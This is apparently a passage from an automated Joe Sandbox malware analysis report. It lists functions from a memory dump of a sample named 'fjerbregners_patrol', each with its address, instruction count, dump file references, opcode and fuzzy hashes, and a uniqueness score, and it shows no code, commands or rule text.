                                                                                                                                                                                            Function 33D97591 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8dc541f7e8f7bb4925e329bee41667fd4364483c1cebc7430fc26f3d7249f64d
                                                                                                                                                                                            • Instruction ID: 23b1cec7b41ad406413b716ae9992178004ca300c8e9f039856cf5c1c583b7e0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc541f7e8f7bb4925e329bee41667fd4364483c1cebc7430fc26f3d7249f64d
                                                                                                                                                                                            • Instruction Fuzzy Hash: BA211675E00309DFEB48CF98C890BECB7B1FB48765F64825AE465A7281CB756842CF90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEFA44 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 0618b16642c9786a4f8261004c1be5540226bb784326370feee92edf29b3d6f3
                                                                                                                                                                                            • Instruction ID: 1a0d90d6b8e4d60a53221858fe9c06e68ce3cdb81b60b0170fd1df896d9b9ed0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0618b16642c9786a4f8261004c1be5540226bb784326370feee92edf29b3d6f3
                                                                                                                                                                                            • Instruction Fuzzy Hash: F211BF75A00700FFE725CF51C800F5ABBBAEF85B90F158699D8419F690EA71E941CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D25921 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 672afbb917fe1811ae7aa3899e5f048dc855659a58cc3e13b7bcf7f9fc6d5870
                                                                                                                                                                                            • Instruction ID: 1fa6b1d050535aea8310c0f68a7819b0d79d9ebda9b77f3f6cfa3cb44943b646
                                                                                                                                                                                            • Opcode Fuzzy Hash: 672afbb917fe1811ae7aa3899e5f048dc855659a58cc3e13b7bcf7f9fc6d5870
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A11E5B2641744BFDB228F09CD04F1B7F6AEB85F54F000028BA049B6A0DA71CC00DAA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D6D69D Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                                                                                                                            • Instruction ID: 1d118ab9bfd5be04f7c6285b4b616db52041d48d3326fd8e37e79bee6352019c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                                                                                                                            • Instruction Fuzzy Hash: A211E572904208BFC7069F6CE8809BEBBB9EF95754F10806AF844DB250DA31CD55C764
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DBD946 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3c7bbed4624c0b0bb57555c0c708be8fbeecdc8468111e0c711210c1714e398b
                                                                                                                                                                                            • Instruction ID: d025264a284f956692c13e905646fcde2f739871e7f67617741e7ba5515c46cf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c7bbed4624c0b0bb57555c0c708be8fbeecdc8468111e0c711210c1714e398b
                                                                                                                                                                                            • Instruction Fuzzy Hash: F601F5A6B002045BCF058E5DCC40B6AB7EAABC4620F584265E49AD7788DE74DC12C3B5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAD270 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
                                                                                                                                                                                            • Instruction ID: 6ed1273e13e35c24c718d7b645ee5560bb243ebba95e03415a5323177980744f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4384220c295f4d3e533a6fcae8810504b2e89fc3e26a35c5d159139cdbb2224c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C016D72A00209AF9B04CBAADA55DAF7BBCEF84654B11005AAD01D3204EB74EF45D770
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE72E0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9af0c16ecc63dd7c0d226a843b0461b2ce4e07f7afc5a09e721b23459351c0aa
                                                                                                                                                                                            • Instruction ID: 2569e2ca3531d46192edc4aae15f75bc1da9490d14708290a414bc32cc265d23
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af0c16ecc63dd7c0d226a843b0461b2ce4e07f7afc5a09e721b23459351c0aa
                                                                                                                                                                                            • Instruction Fuzzy Hash: B1117CB6A00704AFE711CF69C845B9B77E8FF45395F05442AF985CB211D779EC408BA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D23740 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ad73bded456be42f34b55cf8baa35c5e5cc25552c1054329e8ce14ab0ff596e8
                                                                                                                                                                                            • Instruction ID: 547a920795cbe436e0ef0876b44aa6e04f8eb2d8734d5dd677a5ffa3fa1bb586
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad73bded456be42f34b55cf8baa35c5e5cc25552c1054329e8ce14ab0ff596e8
                                                                                                                                                                                            • Instruction Fuzzy Hash: F8115BB9A1424ADFD740CF28C440A85BBF5FB49314F44829AE888CB701D735E880CFA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1F1F0 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c244e36310a92ebecb8d915c6f26840470a8344f9a227006b68c2a1190b4e623
                                                                                                                                                                                            • Instruction ID: 8cb4bc5f507e63b17504608ef74741a2c890d1f995a8c0c1d7ff8edbd276104f
                                                                                                                                                                                            • Opcode Fuzzy Hash: c244e36310a92ebecb8d915c6f26840470a8344f9a227006b68c2a1190b4e623
                                                                                                                                                                                            • Instruction Fuzzy Hash: D511C2B5A017489BDB10CF69C844B5AB7BCBF49A10F5401B5E540EFA42DA38DA01CB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE99F0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4dffe581673bc9702789dc9a29308f6405e069395f7aa37683208ed825a48f00
                                                                                                                                                                                            • Instruction ID: 98ba0eaf2906173aaef2a87b1c4b0526abb05a075e860713941de97a6d0515b0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4dffe581673bc9702789dc9a29308f6405e069395f7aa37683208ed825a48f00
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9001D473641700ABD3229F21CC40E57B7ADEF81BA5F25913AE195CFA91CA35DD42CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF3BA4 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 41e934d5024bd5bba8550dce3f1879b85fe229597609ae54c7e893d4b56fad70
                                                                                                                                                                                            • Instruction ID: ab22707fd6cf9445b6296ad89f938961cb09ea485f57fec690e69cdf3b19c892
                                                                                                                                                                                            • Opcode Fuzzy Hash: 41e934d5024bd5bba8550dce3f1879b85fe229597609ae54c7e893d4b56fad70
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0211EC76921654DFCB25DF48C951F6A77B9FF08B04F55056CE401ABA21CB29EC01CF60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF68C Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b15ae99694e42f973cd1e7ba43bd16e4b1975bcb953e7d25653ebc5b4381e8f9
                                                                                                                                                                                            • Instruction ID: b6bde209d53a9a449d3e260c68b673ee3c13366246fc4c0377cb8c3aace48f80
                                                                                                                                                                                            • Opcode Fuzzy Hash: b15ae99694e42f973cd1e7ba43bd16e4b1975bcb953e7d25653ebc5b4381e8f9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 15115B71E01349ABCB00DFA9C945E9EBBF8EF44710F10406AB900EB280DA74DE018BA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE9303 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                                                                                                                            • Instruction ID: 5f416464b5578363868bf59b441e8df64d15830328f2f1b0d3e6b8c9d49ff235
                                                                                                                                                                                            • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C11A172850B01CFD3219F05C880B12B3E4FF54766F19886DD5D98B8A2C778E880CB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D132C5 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                                                                                                                                            • Instruction ID: 2c0136a227debbd1a01128314a2b5e128b32ce6d464033b809822432cd6935d8
                                                                                                                                                                                            • Opcode Fuzzy Hash: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                                                                                                                                            • Instruction Fuzzy Hash: DA01D172F00605ABCB41CAAAFC00A9F37ACAF84B80F99002AFD15D7910DE30D9218774
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF13E Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a79668b2d26f02cebdf5f2fbb770e3a390fe3e4dc476ad99e92e1451dc1c2d29
                                                                                                                                                                                            • Instruction ID: 2fd8fc37c24392359d65694871efbd45573481bc59694d031523cad70e38f244
                                                                                                                                                                                            • Opcode Fuzzy Hash: a79668b2d26f02cebdf5f2fbb770e3a390fe3e4dc476ad99e92e1451dc1c2d29
                                                                                                                                                                                            • Instruction Fuzzy Hash: 89015E71E01358AFDB04DF69D841EAEBBB8EF45714F4040A6F900EB280DA74DE05CBA4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2D0F0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                                                                                                                            • Instruction ID: 0ab70a1838aded1d6f73dabfcd58858dc0f093a299e5443bb4915cd30b29034c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e905e72580299d3ff224864fab82429879ab6b6a98a0ce6375e50d02db9b367
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9014276A013449FE7028A14C800B4A3BA9EBC0E7CF14415AEEB4CBA88CB34DD4887A1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF607 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 78d3ff4b303b66ec9ea0a0ea2c28fc720c842c2564a58c169a47e5dde9b1643c
                                                                                                                                                                                            • Instruction ID: e514a3088c9ac16cd3e5d8927a6d0c453f026c4d68acae0d1e17b39709701a07
                                                                                                                                                                                            • Opcode Fuzzy Hash: 78d3ff4b303b66ec9ea0a0ea2c28fc720c842c2564a58c169a47e5dde9b1643c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 87015271E01358AFD704DFA9D845E9EBBB8EF45710F444066B940EB380D674DA01CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF582 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 987fc87a4ee4bc29faabb537548dcfd043126d6ab2766ab4e0d83b53572fe826
                                                                                                                                                                                            • Instruction ID: 842a83b4e64d4e08928a7bbd0d56aaa3c089fb4f9b5a8a8933631f3423170b5b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 987fc87a4ee4bc29faabb537548dcfd043126d6ab2766ab4e0d83b53572fe826
                                                                                                                                                                                            • Instruction Fuzzy Hash: AA015271E11358ABDB04DFA9D845E9EBBB8EF45710F404066B900EB280DA74DA01CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF4FD Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: bfdb5289e7f3c3c9be40bf567859de5ab64a8cc4a75ba2649353e6c1e52d14ef
                                                                                                                                                                                            • Instruction ID: e6f5c386dc51365e64dc87ec73b50fcab8b87a98c8b3f196635c7a1ab02197aa
                                                                                                                                                                                            • Opcode Fuzzy Hash: bfdb5289e7f3c3c9be40bf567859de5ab64a8cc4a75ba2649353e6c1e52d14ef
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2015271E01318ABD704DFA9D845E9EBBB8EF45710F004066B914EB280D674DA01CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DAF478 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
